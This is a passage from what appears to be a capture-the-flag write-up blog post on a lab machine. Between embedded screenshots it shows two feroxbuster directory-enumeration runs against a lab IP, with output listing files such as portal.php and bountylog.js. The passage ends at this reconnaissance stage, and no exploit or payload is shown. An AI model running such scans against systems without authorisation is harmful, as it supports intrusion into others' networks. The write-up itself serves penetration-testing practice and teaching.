data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/5721534e-0538-4fe8-8be0-e63bb621598d_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:884,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:100219,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192933060?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5721534e-0538-4fe8-8be0-e63bb621598d_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!51H2!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5721534e-0538-4fe8-8be0-e63bb621598d_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!51H2!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5721534e-0538-4fe8-8be0-e63bb621598d_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!51H2!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5721534e-0538-4fe8-8be0-e63bb621598d_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!51H2!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5721534e-0538-4fe8-8be0-e63bb621598d_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>Nothing much, but when we go to Portal</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!pPjf!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F480cafb6-8e91-4b89-9d1b-7c323d17989c_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!pPjf!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F480cafb6-8e91-4b89-9d1b-7c323d17989c_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!pPjf!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F480cafb6-8e91-4b89-9d1b-7c323d17989c_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!pPjf!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F480cafb6-8e91-4b89-9d1b-7c323d17989c_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!pPjf!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F480cafb6-8e91-4b89-9d1b-7c323d17989c_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!pPjf!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F480cafb6-8e91-4b89-9d1b-7c323d17989c_1590x965.png" width="1590" height="965" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/480cafb6-8e91-4b89-9d1b-7c323d17989c_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:965,&quot;width&quot;:1590,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:106080,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192933060?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fe18f1367-5765-408a-b865-bd343a06becd_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!pPjf!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F480cafb6-8e91-4b89-9d1b-7c323d17989c_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!pPjf!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F480cafb6-8e91-4b89-9d1b-7c323d17989c_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!pPjf!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F480cafb6-8e91-4b89-9d1b-7c323d17989c_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!pPjf!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F480cafb6-8e91-4b89-9d1b-7c323d17989c_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!saMs!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd58ee68d-6203-4ed5-8422-909622a3ca11_1590x965.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!saMs!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd58ee68d-6203-4ed5-8422-909622a3ca11_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!saMs!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd58ee68d-6203-4ed5-8422-909622a3ca11_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!saMs!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd58ee68d-6203-4ed5-8422-909622a3ca11_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!saMs!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd58ee68d-6203-4ed5-8422-909622a3ca11_1590x965.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!saMs!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd58ee68d-6203-4ed5-8422-909622a3ca11_1590x965.png" width="1456" height="884" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/d58ee68d-6203-4ed5-8422-909622a3ca11_1590x965.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:884,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:72604,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192933060?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd58ee68d-6203-4ed5-8422-909622a3ca11_1590x965.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!saMs!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd58ee68d-6203-4ed5-8422-909622a3ca11_1590x965.png 424w, https://substackcdn.com/image/fetch/$s_!saMs!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd58ee68d-6203-4ed5-8422-909622a3ca11_1590x965.png 848w, https://substackcdn.com/image/fetch/$s_!saMs!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd58ee68d-6203-4ed5-8422-909622a3ca11_1590x965.png 1272w, https://substackcdn.com/image/fetch/$s_!saMs!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fd58ee68d-6203-4ed5-8422-909622a3ca11_1590x965.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>We&#8217;re going to be directed to this simple bounty hunter counting measure template.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!E9Nz!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7fe8ada5-8b68-43b1-8da5-4350939b7ab7_1588x963.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!E9Nz!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7fe8ada5-8b68-43b1-8da5-4350939b7ab7_1588x963.png 424w, https://substackcdn.com/image/fetch/$s_!E9Nz!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7fe8ada5-8b68-43b1-8da5-4350939b7ab7_1588x963.png 848w, https://substackcdn.com/image/fetch/$s_!E9Nz!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7fe8ada5-8b68-43b1-8da5-4350939b7ab7_1588x963.png 1272w, https://substackcdn.com/image/fetch/$s_!E9Nz!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7fe8ada5-8b68-43b1-8da5-4350939b7ab7_1588x963.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!E9Nz!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7fe8ada5-8b68-43b1-8da5-4350939b7ab7_1588x963.png" width="1456" height="883" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/7fe8ada5-8b68-43b1-8da5-4350939b7ab7_1588x963.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:883,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:68279,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:&quot;https://byt3n33dl3.substack.com/i/192933060?img=https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7fe8ada5-8b68-43b1-8da5-4350939b7ab7_1588x963.png&quot;,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!E9Nz!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7fe8ada5-8b68-43b1-8da5-4350939b7ab7_1588x963.png 424w, https://substackcdn.com/image/fetch/$s_!E9Nz!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7fe8ada5-8b68-43b1-8da5-4350939b7ab7_1588x963.png 848w, https://substackcdn.com/image/fetch/$s_!E9Nz!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7fe8ada5-8b68-43b1-8da5-4350939b7ab7_1588x963.png 1272w, https://substackcdn.com/image/fetch/$s_!E9Nz!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F7fe8ada5-8b68-43b1-8da5-4350939b7ab7_1588x963.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>For much simpler, i just test with a bunch of &#8220;test&#8220;.</p><p>And since for Discovery and enumeration, I run Ferox:</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo feroxbuster -u http://10.129.95.166/ --filter-status 404 
                                                                                                                                                                                                   
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher &#129299;                 ver: 2.13.1
&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9516;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;
 &#127919;  Target Url            &#9474; http://10.129.95.166/
 &#128681;  In-Scope Url          &#9474; 10.129.95.166
 &#128640;  Threads               &#9474; 50
 &#128214;  Wordlist              &#9474; /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 &#128162;  Status Code Filters   &#9474; [404]
 &#128165;  Timeout (secs)        &#9474; 7
 &#129441;  User-Agent            &#9474; feroxbuster/2.13.1
 &#128137;  Config File           &#9474; /etc/feroxbuster/ferox-config.toml
 &#128270;  Extract Links         &#9474; true
 &#127937;  HTTP methods          &#9474; [GET]
 &#128259;  Recursion Depth       &#9474; 4
&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9524;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;
 &#127937;  Press [ENTER] to use the Scan Management Menu&#8482;
&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;
403      GET        9l       28w      278c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
404      GET        9l       31w      275c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        9l       28w      311c http://10.129.95.166/js =&gt; http://10.129.95.166/js/
200      GET       69l      210w     2424c http://10.129.95.166/js/scripts.js
200      GET      248l      761w    12807c http://10.129.95.166/assets/img/avataaars.svg
200      GET      139l      444w    35267c http://10.129.95.166/assets/img/portfolio/safe.png
200      GET    10240l    19373w   187375c http://10.129.95.166/css/styles.css
301      GET        9l       28w      315c http://10.129.95.166/assets =&gt; http://10.129.95.166/assets/
301      GET        9l       28w      312c http://10.129.95.166/css =&gt; http://10.129.95.166/css/
301      GET        9l       28w      318c http://10.129.95.166/resources =&gt; http://10.129.95.166/resources/
200      GET        6l       34w      210c http://10.129.95.166/resources/README.txt
200      GET        1l       44w     2532c http://10.129.95.166/resources/jquery.easing.min.js
200      GET       64l      232w     2682c http://10.129.95.166/resources/lato.css
200      GET       24l       44w      594c http://10.129.95.166/resources/bountylog.js
200      GET       80l      248w     3228c http://10.129.95.166/resources/monsterat.css
200      GET        5l       15w      125c http://10.129.95.166/portal.php
200      GET      122l      415w    30702c http://10.129.95.166/assets/img/portfolio/cake.png
200      GET        8l       29w    28898c http://10.129.95.166/assets/img/favicon.ico
200      GET      178l      601w    46744c http://10.129.95.166/assets/img/portfolio/game.png
200      GET      150l      506w    43607c http://10.129.95.166/assets/img/portfolio/submarine.png
200      GET      151l      616w    50204c http://10.129.95.166/assets/img/portfolio/circus.png
200      GET        7l      567w    48945c http://10.129.95.166/resources/bootstrap_login.min.js
200      GET      195l      683w    66699c http://10.129.95.166/assets/img/portfolio/cabin.png
200      GET        7l     1031w    84152c http://10.129.95.166/resources/bootstrap.bundle.min.js
200      GET        4l     1298w    86659c http://10.129.95.166/resources/jquery_login.min.js
200      GET        2l     1297w    89476c http://10.129.95.166/resources/jquery.min.js
301      GET        9l       28w      319c http://10.129.95.166/assets/img =&gt; http://10.129.95.166/assets/img/
200      GET        5l   108280w  1194961c http://10.129.95.166/resources/all.js
200      GET      388l     1470w    25169c http://10.129.95.166/
301      GET        9l       28w      329c http://10.129.95.166/assets/img/portfolio =&gt; http://10.129.95.166/assets/img/portfolio/
[##&gt;-----------------] - 50s    19349/180057  6m      found:28      errors:639    
&#128680; Caught ctrl+c &#128680; saving scan state to ferox-http_10_129_95_166_-1775111868.state ...
[##&gt;-----------------] - 50s    19354/180057  6m      found:28      errors:639    
[##&gt;-----------------] - 50s     4429/30000   88/s    http://10.129.95.166/ 
[##&gt;-----------------] - 47s     3456/30000   73/s    http://10.129.95.166/js/ 
[##&gt;-----------------] - 46s     3757/30000   82/s    http://10.129.95.166/assets/ 
[##&gt;-----------------] - 44s     3414/30000   77/s    http://10.129.95.166/css/ 
[####################] - 3s     30000/30000   10571/s http://10.129.95.166/resources/ =&gt; Directory listing (add --scan-dir-listings to scan)
[#&gt;------------------] - 41s     2773/30000   67/s    http://10.129.95.166/assets/img/ 
[&gt;-------------------] - 29s     1431/30000   49/s    http://10.129.95.166/assets/img/portfolio/ 
[--------------------] - 0s         0/30000   -       http://10.129.95.166/js/scripts.js </code></pre></div><p>Since it&#8217;s based PHP let me specify -x PHP.</p><div class="highlighted_code_block" data-attrs="{&quot;language&quot;:&quot;plaintext&quot;,&quot;nodeId&quot;:null}" data-component-name="HighlightedCodeBlockToDOM"><pre class="shiki"><code class="language-plaintext">&#9484;&#9472;&#9472;(kali&#12927;kali)-[~]
&#9492;&#9472;$ sudo feroxbuster -u http://10.129.95.166/ -x php --filter-status 404
                                                                                                                                                                                                   
 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher &#129299;                 ver: 2.13.1
&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9516;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;
 &#127919;  Target Url            &#9474; http://10.129.95.166/
 &#128681;  In-Scope Url          &#9474; 10.129.95.166
 &#128640;  Threads               &#9474; 50
 &#128214;  Wordlist              &#9474; /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt
 &#128162;  Status Code Filters   &#9474; [404]
 &#128165;  Timeout (secs)        &#9474; 7
 &#129441;  User-Agent            &#9474; feroxbuster/2.13.1
 &#128137;  Config File           &#9474; /etc/feroxbuster/ferox-config.toml
 &#128270;  Extract Links         &#9474; true
 &#128178;  Extensions            &#9474; [php]
 &#127937;  HTTP methods          &#9474; [GET]
 &#128259;  Recursion Depth       &#9474; 4
&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9524;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;
 &#127937;  Press [ENTER] to use the Scan Management Menu&#8482;
&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;&#9472;
404      GET        9l       31w      275c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
403      GET        9l       28w      278c Auto-filtering found 404-like response and created new filter; toggle off with --dont-filter
301      GET        9l       28w      311c http://10.129.95.166/js =&gt; http://10.129.95.166/js/
301      GET        9l       28w      312c http://10.129.95.166/css =&gt; http://10.129.95.166/css/
200      GET       64l      232w     2682c http://10.129.95.166/resources/lato.css
200      GET        5l       15w      125c http://10.129.95.166/portal.php
200      GET        1l       44w     2532c http://10.129.95.166/resources/jquery.easing.min.js
200      GET       80l      248w     3228c http://10.129.95.166/resources/monsterat.css
200      GET       69l      210w     2424c http://10.129.95.166/js/scripts.js
200      GET      248l      761w    12807c http://10.129.95.166/assets/img/avataaars.svg
200      GET      122l      415w    30702c http://10.129.95.166/assets/img/portfolio/cake.png
200      GET      150l      506w    43607c http://10.129.95.166/assets/img/portfolio/submarine.png
200      GET      139l      444w    35267c http://10.129.95.166/assets/img/portfolio/safe.png
200      GET        8l       29w    28898c http://10.129.95.166/assets/img/favicon.ico
200      GET      178l      601w    46744c http://10.129.95.166/assets/img/portfolio/game.png
301      GET        9l       28w      315c http://10.129.95.166/assets =&gt; http://10.129.95.166/assets/
200      GET       24l       44w      594c http://10.129.95.166/resources/bountylog.js
200      GET        6l       34w      210c http://10.129.95.166/resources/README.txt
